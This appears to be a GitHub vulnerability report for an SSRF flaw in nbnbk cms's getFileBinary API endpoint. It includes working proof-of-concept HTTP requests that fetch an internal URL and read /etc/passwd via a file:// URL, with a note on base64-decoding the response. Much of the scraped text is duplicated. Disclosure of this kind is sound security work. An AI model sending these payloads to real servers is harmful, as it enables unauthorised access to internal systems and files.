A Server-Side Request Forgery (SSRF) in getFileBinary function of nbnbk cms allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the url parameter.
Vulnerable code in /application/api/controller/Index.php
GET /api/Index/getFileBinary?url=http://172.16.119.1:8181/flag.txt HTTP/1.1
Host: 172.16.119.130
Connection: close
The effect of the exploit is shown in the following figure. A remote attacker can force the application to make arbitrary requests via the injection of arbitrary URLs into the url parameter.
A remote attacker can also read arbitrary file information from the target system.
PoC
GET /api/Index/getFileBinary?url=file:///etc/passwd HTTP/1.1
Host: 172.16.119.130
Connection: close
After decoding the data field of the HTTP response body in base64, you can get the specific content of the file (/etc/passwd)
The text was updated successfully, but these errors were encountered:
A Server-Side Request Forgery (SSRF) in getFileBinary function of nbnbk cms allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the url parameter.
Vulnerable code in
/application/api/controller/Index.phpVulnerability PoC
The effect of the exploit is shown in the following figure. A remote attacker can force the application to make arbitrary requests via the injection of arbitrary URLs into the url parameter.
A remote attacker can also read arbitrary file information from the target system.
PoC
After decoding the data field of the HTTP response body in base64, you can get the specific content of the file (
/etc/passwd)The text was updated successfully, but these errors were encountered: